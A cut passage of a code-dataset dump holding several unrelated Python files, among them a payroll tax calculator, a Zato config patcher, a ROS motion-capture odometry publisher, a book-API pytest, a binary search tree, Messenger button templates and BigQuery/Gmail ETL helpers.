error!\")\n exit(-2)\n\n #mytmp_list.append(self.user_file)\n try:\n index = line_args.index('-o')\n self.gongzi_file = line_args[index+1]\n except ValueError:\n print(\"args -o error!\")\n exit(-3)\n\n #mytmp_list.append(self.gongzi_file)\n \n #print(mytmp_list)\n #print(self.config_file,self.user_file,self.gongzi_file)\n #return self.config_file,self.user_file,self.gongzi_file\n #return mytmp_list\n return None\n \n\nclass Config(object):\n config_dict = {}\n def __init__(self,configfile):\n self._config = self._read_config(configfile)\n\n def _read_config(self,configfile):\n #config_dict = {}\n\n with open(configfile,'r') as cf:\n for line in cf:\n mylist = (line.strip()).split(\"=\")\n self.config_dict[mylist[0].strip()] = mylist[1].strip()\n\n return self.config_dict\n\n\nclass IncomeTaxcalculator(object):\n\n def __init__(self,conf_dict,userdata):\n self.gongzi_list = self.jisuan_gongzi(conf_dict,userdata)\n\n def jisuan_gongzi(self,conf_dict,userdata):\n gongzi_list = []\n \n jiaofei_bili = float(conf_dict['YangLao']) + float(conf_dict['YiLiao']) + float(conf_dict['ShiYe']) + float(conf_dict['GongShang']) + float(conf_dict['ShengYu']) + float(conf_dict['GongJiJin'])\n \n #shui_qian_gongzi = float(userdata[-1][1])\n shui_qian_gongzi = float(userdata[1])\n if shui_qian_gongzi < float(conf_dict['JiShuL']) :\n she_bao = float(conf_dict['JiShuL']) * jiaofei_bili\n elif shui_qian_gongzi > float(conf_dict['JiShuH']) :\n she_bao = float(conf_dict['JiShuH']) * jiaofei_bili\n else :\n she_bao = shui_qian_gongzi * jiaofei_bili\n\n ying_na_shui_e = (shui_qian_gongzi - she_bao - 3500)\n if ying_na_shui_e > 80000 :\n ying_na_shui = (ying_na_shui_e * 0.45 - 13505)\n elif ying_na_shui_e > 55000 :\n ying_na_shui = (ying_na_shui_e * 0.35 - 5505)\n elif ying_na_shui_e > 35000 :\n ying_na_shui = (ying_na_shui_e * 0.30 - 2755)\n elif ying_na_shui_e > 9000 :\n ying_na_shui = (ying_na_shui_e * 0.25 - 1005)\n elif ying_na_shui_e > 4500 :\n ying_na_shui = (ying_na_shui_e * 0.20 - 555)\n elif ying_na_shui_e > 1500 :\n ying_na_shui = (ying_na_shui_e * 0.10 - 105)\n elif ying_na_shui_e > 0 :\n ying_na_shui = (ying_na_shui_e * 0.03)\n else :\n ying_na_shui = 0\n\n shui_huo_gongzi = (shui_qian_gongzi - ying_na_shui - she_bao)\n\n #gongzi_list.append(userdata[-1][0])\n #gongzi_list.append(userdata[-1][1])\n gongzi_list.append(userdata[0])\n gongzi_list.append(userdata[1])\n gongzi_list.append(str(format(she_bao,\".2f\")))\n gongzi_list.append(str(format(ying_na_shui,\".2f\")))\n gongzi_list.append(str(format(shui_huo_gongzi,\".2f\")))\n\n return gongzi_list\n #return a list for cun fang shui huo gongzi\n\n# *************\n#\"\"\"\n#class UserData(object):\n#\n# def __init__(self,userfile,conf_dict,gongzi_file):\n# self.userdata = self._read_users_data(userfile,conf_dict,gongzi_file)\n#\n# def _read_users_data(self,userfile,conf_dict,gongzi_file):\n# userdata = []\n# with open(gongzi_file,'w+') as gf:\n#\n# with open(userfile,'r') as uf:\n# for line in uf:\n# userdata.append((line.strip()).split(\",\"))\n# #userdata is 2 wei shuzu\n# income_tax = IncomeTaxcalculator(conf_dict,userdata)\n# print(income_tax.gongzi_list)\n# csv.writer(gf).writerow(income_tax.gongzi_list)\n#\n#\n# return userdata\n#\"\"\"\n\ndef proc1(*args):\n userfile = args[1]\n userdata = []\n with open(userfile,'r') as uf:\n for line in uf:\n userdata.append((line.strip()).split(','))\n queue1.put(userdata[-1],True,1)\n print('Send userdata :{}'.format(userdata[-1]))\n #time.sleep(1)\n\ndef proc2(*args):\n conf_dict = args[2]\n while True:\n #if (not queue1.empty()) :\n try:\n income_tax = IncomeTaxcalculator(conf_dict,queue1.get(True,1))\n queue2.put(income_tax.gongzi_list,True,1)\n print('Send gongzi_list :{}'.format(income_tax.gongzi_list))\n #time.sleep(1)\n except :\n return None\n\ndef proc3(*args):\n gongzi_file = args[1]\n print(\"gongzi_file ==> {}\".format(gongzi_file))\n gongzi_list = []\n with open(gongzi_file,'w+') as gf:\n while True:\n #if (not queue2.empty()):\n try:\n #gf.seek(2,0)\n gongzi_list = queue2.get(True,1)\n print(\"gongzi_list = {}\".format(gongzi_list))\n csv.writer(gf).writerow(gongzi_list)\n #csv.writer(gf).writerow(queue2.get(True,1))\n #time.sleep(1)\n except :\n return None\n\nif __name__ == '__main__':\n if len(sys.argv) <= 1 :\n print(\"Usage:{} -c test.cfg -d user.csv -o gongzi.csv\".format(sys.argv[0]))\n else:\n queue1 = Queue()\n queue2 = Queue()\n chuli_args = Args()\n #print(chuli_args.config_file)\n #print(chuli_args.user_file)\n \n chuli_config = Config(chuli_args.config_file)\n #print(chuli_config.config_dict)\n \n #chuli_user = UserData(chuli_args.user_file,chuli_config.config_dict,chuli_args.gongzi_file)\n #print(chuli_user.userdata)\n\n #Process(target = proc1,args=(queue1,chuli_args.user_file)).start()\n #Process(target = proc2,args=(queue1,queue2,chuli_config.config_dict)).start()\n #Process(target = proc1,args=(queue2,chuli_args.gongzi_file)).start()\n p1 = Process(target = proc1,args=(queue1,chuli_args.user_file))\n p2 = Process(target = proc2,args=(queue1,queue2,chuli_config.config_dict))\n p3 = Process(target = proc3,args=(queue2,chuli_args.gongzi_file))\n\n p1.start()\n p2.start()\n p3.start()\n\n time.sleep(3) # Important zeng jia yanchi shi de queue not empty \n # in order to bao zheng queue1 queue2 not empty when \n # proc1 proc2 proc3 beginning!!!\n if (queue1.empty() and queue2.empty()) :\n p1.terminate()\n p1.join()\n #if (queue2.empty()):\n p2.terminate()\n p2.join()\n p3.terminate()\n p3.join()\n\n\n\n\n","sub_path":"calculator-multi.py","file_name":"calculator-multi.py","file_ext":"py","file_size_in_byte":7247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"284398287","text":"#!/opt/zato/current/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright (C) 2019, Zato Source s.r.o. https://zato.io\nLicensed under LGPLv3, see LICENSE.txt for terms and conditions.\n\nconfigset.py is used to dockerize Zato components. This script allows you to configure Zato's server.conf and sso.conf by environment variables.\n\nExamples:\nserver__component_enabled__sso=True configures server.conf [component_enabled] sso with value 'True'\nsso__signup__is_approval_needed=False configures sso.conf [signup] is_approval_needed with value 'False'\n\n\"\"\"\n\nimport os\nimport configobj\n\nserver_config_changed = False\nserver_config_path = '/opt/zato/env/qs-1/config/repo/server.conf'\nserver_config = configobj.ConfigObj(server_config_path, use_zato=False)\n\nsso_config_changed = False\nsso_config_path = '/opt/zato/env/qs-1/config/repo/sso.conf'\nsso_config = configobj.ConfigObj(sso_config_path, use_zato=False)\n\ndef patch(key, value):\n parts = key.split('__')\n filename = parts.pop(0) + '.conf'\n key = parts.pop(-1)\n nestedSections = parts\n print(filename, nestedSections, key, value)\n _patch(filename, nestedSections, key, value)\n\ndef _patch(filename, nestedSections, key, value):\n global server_config_changed\n global sso_config_changed\n if filename == 'server.conf':\n config = None\n for n in nestedSections:\n if config:\n config = config.get(n, {})\n else:\n config = server_config.get(n, {})\n config[key] = value\n server_config_changed = True\n if filename == 'sso.conf':\n config = None\n for n in nestedSections:\n if config:\n config = config[n]\n else:\n config = sso_config.get(n, {})\n config[key] = value\n sso_config_changed = True\n\n# Patch config file based on environment format:\n# server__section_key=value -> server.conf [section] key = value\n# sso__section_key=value -> sso.conf [section] key = value\nfor i in os.environ:\n if 'server__' in str(i):\n patch(i, os.environ.get(i) )\n if 'sso__' in str(i):\n patch(i, os.environ.get(i) )\n\n# Patch lagacy environment variables\nZATO_SSO = os.environ.get('ZATO_SSO')\nif ZATO_SSO == 'y':\n patch('server__component_enabled__sso', 'True')\nZATO_SSO_IS_APPROVAL_NEEDED = os.environ.get('ZATO_SSO_IS_APPROVAL_NEEDED')\nif ZATO_SSO_IS_APPROVAL_NEEDED == 'n':\n patch('sso__signup__is_approval_needed', 'False')\n\n# Overwrite configuration files\nif server_config_changed:\n server_config.write()\n\nif sso_config_changed:\n sso_config.write()\n\n","sub_path":"docker/cloud/configset.py","file_name":"configset.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"385122946","text":"import os\nimport math\n\nCHUNK_SIZE = 1024*1024 # 1MB\n\n\ndef get_total_file_chunks(filename):\n return math.ceil(os.path.getsize(filename) / CHUNK_SIZE)\n \ndef get_file_chunks(filename): \n with open(filename, 'rb') as f:\n while True: \n piece = f.read(CHUNK_SIZE);\n if not piece:\n break\n yield piece\n\ndef write_file_chunks(message):\n file_name = message.origin + \"_\" + str(message.id)\n with open(file_name, \"ab\") as myfile:\n myfile.write(message.data)","sub_path":"samples/ring/utils/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"479757398","text":"#!/usr/bin/env python\n\nimport tf\nimport os\nimport math\nimport time\nimport rospy\nimport tf2_ros\nimport threading\nimport numpy as np\nimport geometry_msgs.msg\nfrom std_msgs.msg import Float64\nfrom qualisys.msg import Subject\nfrom nav_msgs.msg import Odometry\n\n\n#####################################################\n# Initialize Threading Class #\n#####################################################\nclass ThreadedFunction(threading.Thread):\n\n #####################################################\n # Initialize Object #\n #####################################################\n def __init__(self, fcn_to_thread):\n threading.Thread.__init__(self)\n\n self.runnable = fcn_to_thread\n self.daemon = True\n\n def run(self):\n self.runnable()\n\n\nclass qualisys_odom_publisher():\n def __init__(self):\n #####################################################\n # Initialize Variables and Constants #\n #####################################################\n self.ODOM_MOCAP_ACTIVE = False\n self.MAIN_INTERFACE_STARTED = False\n self.PARAMETERS_INITIALIZED = False\n self.PARAMETER_UPDATED = False\n self.UPDATE_PARAM_RATE = 10\n self.UPDATE_PARAM_TIME = 1/self.UPDATE_PARAM_RATE\n self.dt_interface = 0.4\n\n self.x = 0\n self.y = 0\n self.x_prev = 0\n self.y_prev = 0\n self.time0 = 0\n self.time1 = 0\n self.dT = 0\n\n rospy.init_node('qualisys_odom_node')\n self.velocity = Float64()\n self.br = tf2_ros.TransformBroadcaster()\n self.pub = rospy.Publisher('qualisys/odom', Odometry, queue_size=1)\n self.pub_vel = rospy.Publisher('qualisys/vel', Float64, queue_size=1)\n\n self.t = geometry_msgs.msg.TransformStamped()\n\n self.initial_odom = False\n self.initial_x = 0\n self.initial_y = 0\n self.initial_z = 0\n self.initial_roll = 0\n self.initial_pitch = 0\n self.initial_yaw = 0\n\n #####################################################\n # Clear Screen #\n #####################################################\n def cls(self):\n os.system(\"clear\")\n\n #####################################################\n # SET PARAMETER #\n #####################################################\n def set_f1vt18_parameter(self, parameter_name, value=False):\n resolved_global_name = \"/f1vt18/\" + parameter_name\n rospy.set_param(resolved_global_name, value)\n\n #####################################################\n # SET PARAMETER #\n #####################################################\n def get_f1vt18_parameter(self, parameter_name, value=False):\n resolved_global_name = \"/f1vt18/\" + parameter_name\n return rospy.get_param(resolved_global_name, value)\n\n #####################################################\n # UPDATE PARAMETERS #\n #####################################################\n def update_parameters(self):\n while not rospy.is_shutdown():\n while not self.PARAMETERS_INITIALIZED:\n self.PARAMETERS_INITIALIZED = self.get_f1vt18_parameter(\"PARAMETERS_INITIALIZED\")\n pass\n\n # UPDATE PARAMETERS HERE\n self.PARAMETER_UPDATED = True\n self.set_f1vt18_parameter(\"ODOM_MOCAP_ACTIVE\", self.ODOM_MOCAP_ACTIVE)\n time.sleep(self.UPDATE_PARAM_TIME)\n self.ODOM_MOCAP_ACTIVE = False\n self.set_f1vt18_parameter(\"ODOM_MOCAP_ACTIVE\", self.ODOM_MOCAP_ACTIVE)\n\n def initialize_subscriber(self):\n rospy.Subscriber('/qualisys/V1', Subject, self.publish_odom_callback)\n while not rospy.is_shutdown():\n rospy.spin()\n\n def publish_odom_callback(self, msg):\n self.ODOM_MOCAP_ACTIVE = True\n if self.initial_odom:\n self.initial_odom = True\n self.initial_x = msg.position.x\n self.initial_y = msg.position.y\n self.initial_z = msg.position.z\n (self.initial_roll, self.initial_pitch, self.initial_yaw) = tf.transformations.euler_from_quaternion(\n [msg.orientation.x, msg.orientation.y, msg.orientation.z, msg.orientation.w])\n\n distance_x = msg.position.x - self.initial_x\n distance_y = msg.position.y - self.initial_y\n\n current_time = rospy.Time.now()\n self.t.header.stamp = current_time\n self.t.header.frame_id = \"odom\"\n self.t.child_frame_id = \"f1vt18_CG\"\n self.t.transform.translation.x = np.cos(self.initial_yaw) * distance_x + np.sin(self.initial_yaw) * distance_y\n self.t.transform.translation.y = -np.sin(self.initial_yaw) * distance_x + np.cos(self.initial_yaw) * distance_y\n self.t.transform.translation.z = 0.0\n\n (self.current_roll, self.current_pitch, self.current_yaw) = tf.transformations.euler_from_quaternion(\n [msg.orientation.x, msg.orientation.y, msg.orientation.z, msg.orientation.w])\n\n theta = self.current_yaw - self.initial_yaw\n q = tf.transformations.quaternion_from_euler(0, 0, theta)\n self.t.transform.rotation.x = q[0]\n self.t.transform.rotation.y = q[1]\n self.t.transform.rotation.z = q[2]\n self.t.transform.rotation.w = q[3]\n self.br.sendTransform(self.t)\n\n odom = Odometry()\n odom.header.stamp = current_time\n odom.header.frame_id = \"odom\"\n odom.child_frame_id = \"f1vt18_CG\"\n odom.pose.pose.position.x = self.t.transform.translation.x\n odom.pose.pose.position.y = self.t.transform.translation.y\n odom.pose.pose.position.z = 0.0\n odom.pose.pose.orientation.x = q[0]\n odom.pose.pose.orientation.y = q[1]\n odom.pose.pose.orientation.z = q[2]\n odom.pose.pose.orientation.w = q[3]\n self.pub.publish(odom)\n\n x_temp = odom.pose.pose.position.x\n y_temp = odom.pose.pose.position.y\n _, _, yaw_temp = tf.transformations.euler_from_quaternion(\n [odom.pose.pose.orientation.x, odom.pose.pose.orientation.y, odom.pose.pose.orientation.z,\n odom.pose.pose.orientation.w])\n #print(\"X: \" + str(x_temp) + \" Y: \" + str(yaw_temp) + \" Yaw: \" + str(yaw_temp * 180 / np.pi))\n self.x = msg.position.x # np.cos(yaw_temp)*x_temp + np.sin(yaw_temp)*y_temp\n self.y = msg.position.y # -np.sin(yaw_temp)*x_temp + np.cos(yaw_temp)*y_temp\n self.time1 = rospy.get_time()\n self.dT = self.time1 - self.time0\n self.velocity = (((self.x - self.x_prev) ** 2) / self.dT ** 2 + (\n (self.y - self.y_prev) ** 2) / self.dT ** 2) ** 0.5\n #print(\"Velocity in odom frame\" + str(self.velocity))\n self.velocity = np.cos(theta)*self.velocity - np.sin(theta)*self.velocity\n self.pub_vel.publish(self.velocity)\n self.x_prev = self.x\n self.y_prev = self.y\n self.time0 = rospy.get_time()\n\n#####################################################\n # Initialize Control Interface for Terminal #\n #####################################################\n def display_interface(self):\n #####################################################\n # WHILE LOOP for User Input #\n #####################################################\n while not rospy.is_shutdown():\n\n print(\"####################################\\r\")\n print(\" Waiting for PARAMETERS INI \\r\")\n print(\"------------------------------------\\r\")\n print('Press q if frozen... \\r')\n while not self.PARAMETERS_INITIALIZED and not rospy.is_shutdown():\n time.sleep(2)\n pass\n\n #####################################################\n # UPDATE PARAMETERS FROM ROS PARAMETER SERVER #\n #####################################################\n self.PARAMETER_UPDATED = False\n print(\"####################################\\r\")\n print(\" Waiting for PARAMETERS UPDATE \\r\")\n print(\"------------------------------------\\r\")\n print('Press q if frozen... \\r')\n while not self.PARAMETER_UPDATED and not rospy.is_shutdown():\n pass\n\n self.cls()\n #####################################################\n # ### Print Control Interface to Terminal ### #\n #####################################################\n #####################################################\n # Show current mode #\n #####################################################\n print(\"##################################\\r\")\n print(\"Mode: [x]= active | [-]= inactive \\r\")\n print(\"----------------------------------\\r\")\n print(\"----------------------------------\\r\")\n\n time.sleep(self.dt_interface)\n #self.cls()\n\n\nif __name__ == '__main__':\n try:\n print(\"----------------------------------\\r\")\n print(\"##################################\\r\")\n print(\"# PROGRAM HAS BEEN STARTED #\\r\")\n print(\"##################################\\r\")\n print(\"... initialize vehicle object \\r\")\n time.sleep(1)\n odom_pub = qualisys_odom_publisher()\n\n Thread_Publish_Emergency = ThreadedFunction(odom_pub.initialize_subscriber)\n Thread_Update_Parameters = ThreadedFunction(odom_pub.update_parameters)\n #Thread_Display_Interface = ThreadedFunction(odom_pub.display_interface)\n\n Thread_Publish_Emergency.start()\n Thread_Update_Parameters.start()\n #Thread_Display_Interface.start()\n odom_pub.display_interface()\n rospy.set_param('/f1vt18/MAIN_INTERFACE_STARTED', False)\n rospy.set_param('/f1vt18/PARAMETERS_INITIALIZED', False)\n except rospy.ROSInterruptException:\n pass\n","sub_path":"control/src/sim_feedback_mocap.py","file_name":"sim_feedback_mocap.py","file_ext":"py","file_size_in_byte":10170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"411190832","text":"import pytest\nimport requests\nimport sys\nfrom faker import Faker\nfrom random import randint\n\n\ndef transfer(input_args, id_get):\n return {\"body\": {\"amount\": input_args[\"amount\"],\n \"author\": input_args[\"book_author\"],\n \"name\": input_args[\"book_name\"],\n \"id\": id_get}, \"status\": 200}\n\n\ndef find_book(json_obj, text):\n for t in text:\n if t[\"id\"] == json_obj[\"id\"] and \\\n t[\"amount\"] == json_obj[\"amount\"] and \\\n t[\"author\"] == json_obj[\"author\"] and \\\n t[\"name\"] == json_obj[\"name\"]:\n return True\n return False\n\n\ndef get_json():\n return {\"book_name\": Faker().sentence(nb_words=3), \"book_author\": Faker().name(), \"amount\": randint(0, 30)}\n\n\n@pytest.mark.parametrize(\"http_method\", [\"GET\", \"POST\"])\n@pytest.mark.parametrize(\"data_method\", [\"query\", \"json\"])\ndef test_add_book(http_method, data_method, get_url):\n \"\"\"\n Checks book adding\n\n :param http_method: HTTP method\n :param data_method: parameters json or query\n :param get_url: fixture that gets base url of API\n\n \"\"\"\n url = get_url + \"book/add\"\n data_list = get_json()\n sys.stdout.write(\"Method = {}, Url = {}, Data Method = {}, Parameters = {}\\n\"\n .format(http_method, url, data_method, data_list))\n\n if data_method == \"query\":\n response = requests.request(http_method, url, params=data_list)\n else:\n response = requests.request(http_method, url, json=data_list)\n\n sys.stdout.write(response.text + '\\n')\n if response.status_code == 405:\n pytest.skip(\"Bug 1 - book/add do not support POST\")\n assert response.status_code == 200, \"Status differs from the expected one\"\n\n json_obj = response.json()\n bk_id = json_obj[\"body\"][\"id\"]\n assert json_obj == transfer(data_list, bk_id), \"A book with incorrect data was added\"\n\n url = get_url + \"book\"\n assert requests.get(url, params={\"book_id\": bk_id}).json() == json_obj, \\\n \"Book on this identifier was not found\"\n\n url = get_url + \"books\"\n assert find_book(json_obj[\"body\"], requests.get(url).json()[\"body\"][\"books\"]), \\\n \"There is no new book in all books list\"\n","sub_path":"test_add_books.py","file_name":"test_add_books.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"456968172","text":"# this file is to implement a node-based Binary Search Tree\nclass Node():\n def __init__(self, value, left=None, right=None):\n self._value = value\n self._left = left\n self._right = right\n\n def getValue(self):\n return self._value\n\n def setValue(self, data):\n self._value = data\n\n def getLeft(self):\n return self._left\n\n def setLeft(self, Node):\n self._left = Node\n\n def getRight(self):\n return self._right\n\n def setRight(self, Node):\n return self._right\n\n def _str_(self):\n return \"{0:<10}{1:<10}{2:<10}\".format(\n str(self._left.getValue()) if self._left else \"None\",\n str(self._value),\n str(self._right.getValue()) if self._right else \"None\")\n\n\nclass BST():\n def __init__(self):\n self._root = None\n\n def isEmpty(self):\n return not self._root\n\n # wrap up methof for insertRecursive\n def insertR(self, data):\n if not self._root:\n self._root = Node(data)\n else:\n self.insertRecursive(data, self._root)\n\n def insertRecursive(self, data, current):\n if data < current.getValue():\n if not current.getLeft():\n current.setLeft(Node(data))\n # return\n else:\n self.insertRecursive(data, current.getLeft())\n else:\n if not current.getRight():\n current.setRight(Node(data))\n else:\n self.insertRecursive(data, current.getRight())\n\n def insertIterative(self, data):\n newNode = Node(data)\n # if it is empty\n if self.isEmpty():\n self._root = newNode\n return\n current = self._root\n while True:\n if data < current.getValue():\n if not current.getLeft():\n current = current.getLeft()\n else:\n current.setLeft(newNode)\n return\n else: # elif data > current.getValue():\n if not current.getRight():\n current = current.getRight()\n else:\n current.setRight(newNode)\n return\n\n def exist(self, data):\n if self.isEmpty():\n return False\n current = self._root\n while current:\n if data == current.getValue():\n return True\n elif data < current.getValue():\n current = current.getLeft()\n else: # data > current.getValue():\n current = current.getRight()\n return False\n\n def existR(self, data):\n if self.isEmpty():\n return False\n else:\n self.existRecursive(data, self._root)\n\n def existRecursive(self, data, current):\n if data == current.getValue():\n return True\n elif data < current.getValue():\n if not current.getLeft():\n return False\n else:\n return self.existRecursive(data, current.getLeft())\n else:\n if not current.getRight():\n return False\n else:\n return self.existRecursive(data, current.getRight())\n\n def print(self):\n # traverse from top to its right subtree then left for every node\n if self.isEmpty():\n print(\"Empty\")\n return\n stack = [self._root]\n print(\"{0:<10}{1:<10}{2:<10}\".format(\"Node.left\", \"Node.data\",\n \"Node.right\"))\n while len(stack) > 0:\n current = stack.pop()\n print(current)\n if current.getLeft():\n stack.append(current.getLeft())\n if current.getRight():\n stack.append(current.getRight())\n\n # traverse the nodes in a seuqence such that the nodes can form the same tree\n # with the same sequence\n def pre_order_traversal(self, current):\n res = []\n if current:\n res.append(current.getValue())\n res += self.pre_order_traversal(current.getLeft())\n res += self.pre_order_traversal(current.getRight())\n return res\n\n # traverse the nodes in a sorted manner\n def in_order_traversal(self, current):\n res = []\n if current:\n res += self.in_order_traversal(current.getLeft())\n res.append(current)\n res += self.in_order_traversal(current.getRight())\n return res\n\n # traverse the nodes from bottom level, from left to right\n def post_order_traversal(self, current):\n res = []\n if current:\n res += self.post_order_traversal(current.getLeft())\n res += self.post_order_traversal(current.getRight())\n res.append(current)\n return res\n","sub_path":"python/python_lesson/5_6/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"408328688","text":"class Buttons(object):\n def __init__(self, text, buttons):\n self.type = 'template'\n self.payload = {\n 'template_type': 'button',\n 'text': text,\n 'buttons': Buttons.convert_shortcut_buttons(buttons)\n }\n\n @staticmethod\n def convert_shortcut_buttons(items):\n \"\"\"\n support shortcut buttons [{'type':'web_url', 'title':'open web url', 'value':'https://~~'}]\n \"\"\"\n if items is not None and isinstance(items, list):\n result = []\n for item in items:\n if isinstance(item, BaseButton):\n result.append(item)\n elif isinstance(item, dict):\n if item.get('type') in ['web_url', 'postback', 'phone_number']:\n type = item.get('type')\n title = item.get('title')\n value = item.get('value', item.get('url', item.get('payload')))\n\n if type == 'web_url':\n result.append(ButtonWeb(title=title, url=value))\n elif type == 'postback':\n result.append(ButtonPostBack(title=title, payload=value))\n elif type == 'phone_number':\n result.append(ButtonPhoneNumber(title=title, payload=value))\n\n else:\n raise ValueError('Invalid button type')\n else:\n raise ValueError('Invalid buttons variables')\n return result\n else:\n return items\n\nclass BaseButton(object):\n pass\n\nclass ButtonWeb(BaseButton):\n def __init__(self, title, url):\n self.type = 'web_url'\n self.title = title\n self.url = url\n\nclass ButtonPostBack(BaseButton):\n def __init__(self, title, payload):\n self.type = 'postback'\n self.title = title\n self.payload = payload\n\n\nclass ButtonPhoneNumber(BaseButton):\n def __init__(self, title, payload):\n self.type = 'phone_number'\n self.title = title\n self.payload = payload\n\nclass Generic(object):\n def __init__(self, elements):\n self.type = 'template'\n self.payload = {\n 'template_type': 'generic',\n 'elements': elements\n }\n\n\nclass GenericElement(object):\n def __init__(self, title, subtitle=None, item_url=None, image_url=None, buttons=None):\n self.title = title\n self.subtitle = subtitle\n self.item_url = item_url\n self.image_url = image_url\n self.buttons = Buttons.convert_shortcut_buttons(buttons)","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"506406065","text":"import json\nimport numpy as np\nimport pandas as pd\n\nimport pickle\nimport os.path\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\nfrom apiclient import discovery\nfrom apiclient import errors\nfrom httplib2 import Http\n\nfrom google.oauth2 import service_account\nfrom google.cloud import bigquery\n\nimport base64\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport mimetypes\nimport os\n\nfrom apiclient import errors\n\n# ---------------------------------------------------------------------------- #\n\n# SCHEMA Functions\n\ndef load_json(path):\n with open(path) as fil:\n return json.load(fil)\n\ndef create_dF_from_schema(endpoint):\n\n schema = load_json(\"schemas/\" + endpoint + \".json\")\n\n dF = pd.DataFrame(columns=list(schema.keys()))\n\n return dF\n\ndef update_dF_dtypes_from_schema(endpoint, dF):\n\n schema = load_json(\"schemas/\" + endpoint + \".json\")\n\n for col, dtype in schema.items():\n\n dtype = dtype['type'][1]\n if dtype == 'string' or dtype == 'boolean':\n continue\n if dtype == 'integer':\n dF[col] = pd.to_numeric(dF[col], downcast='integer')\n if dtype == 'float':\n dF[col] = pd.to_numeric(dF[col], downcast='float')\n if dtype == 'datetime':\n dF[col] = pd.to_datetime(dF[col])\n\n return dF\n\n# ---------------------------------------------------------------------------- #\n\n# BIGQUERY Functions\n\ndef bigquery_upload(service_cred, project_name, dataset_name, table_name, dF):\n\n credentials = service_account.Credentials.from_service_account_file(\n service_cred)\n\n # load dataframe into BigQuery\n client = bigquery.Client(project=project_name, credentials=credentials)\n dataset_ref = client.dataset(dataset_name)\n table_ref = dataset_ref.table(table_name)\n\n client.load_table_from_dataframe(dF, table_ref).result()\n\n# ---------------------------------------------------------------------------- #\n\n# GMAIL Functions\n\ndef google_auth(cred_path):\n\n SCOPES = [\n 'https://www.googleapis.com/auth/gmail.send',\n 'https://www.googleapis.com/auth/webmasters.readonly'\n ]\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists(cred_path + 'token.pickle'):\n with open(cred_path + 'token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n cred_path + 'credentials_2.json', SCOPES)\n creds = flow.run_local_server()\n # Save the credentials for the next run\n with open(cred_path + 'token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n GMAIL = discovery.build('gmail', 'v1', credentials=creds, cache_discovery=False)\n WEBMASTER = discovery.build('webmasters', 'v3', credentials=creds, cache_discovery=False)\n return {'gmail': GMAIL, 'search_console': WEBMASTER}\n\ndef SendMessageWithAttachment(cred_path, sender, to, subject, message_text, file_dir, filename):\n\n GMAIL = google_auth(cred_path)['gmail']\n\n \"\"\"Create a message for an email.\n\n Args:\n sender: Email address of the sender.\n to: Email address of the receiver.\n subject: The subject of the email message.\n message_text: The text of the email message.\n file_dir: The directory containing the file to be attached.\n filename: The name of the file to be attached.\n\n Returns:\n An object containing a base64url encoded email object.\n \"\"\"\n message = MIMEMultipart()\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n\n msg = MIMEText(message_text)\n message.attach(msg)\n\n path = os.path.join(file_dir, filename)\n content_type, encoding = mimetypes.guess_type(path)\n\n if content_type is None or encoding is not None:\n content_type = 'application/octet-stream'\n main_type, sub_type = content_type.split('/', 1)\n if main_type == 'text':\n fp = open(path, 'rb')\n msg = MIMEText(fp.read(), _subtype=sub_type, _charset='utf-8')\n fp.close()\n elif main_type == 'image':\n fp = open(path, 'rb')\n msg = MIMEImage(fp.read(), _subtype=sub_type, _charset='utf-8')\n fp.close()\n elif main_type == 'audio':\n fp = open(path, 'rb')\n msg = MIMEAudio(fp.read(), _subtype=sub_type, _charset='utf-8')\n fp.close()\n else:\n fp = open(path, 'rb')\n msg = MIMEBase(main_type, sub_type)\n msg.set_payload(fp.read())\n fp.close()\n\n msg.add_header('Content-Disposition', 'attachment', filename=filename)\n message.attach(msg)\n\n b64_bytes = base64.urlsafe_b64encode(message.as_bytes())\n b64_string = b64_bytes.decode()\n body = {'raw': b64_string}\n\n GMAIL.users().messages().send(userId='me', body=body).execute()\n\n return {'raw': body}\n\n# ---------------------------------------------------------------------------- #\n\n# Flatten JSON\n\ndef flatten_json(y):\n out = {}\n\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a], name + a + '_')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '_')\n i += 1\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out\n\n# ---------------------------------------------------------------------------- #\n","sub_path":"etl_tools.py","file_name":"etl_tools.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"168627287","text":"\"\"\"\nRun after running fullcolombia6.py\n\"\"\"\n\nfrom optima import dcp, plotresults, loadobj, Multiresultset, comparepars, plotpars\nfilename = 'files/colombia-20160531.prj'\n\ntmp = loadobj(filename)\nQ = dcp(tmp)\nQ.copyparset('default','curr')\nQ.copyparset('default','optim')\n\norigpars = Q.parsets['default'].pars[0]\ncurrpars = Q.results['optim-minoutcome_final_default'].parset[0].pars[0]\noptpars = 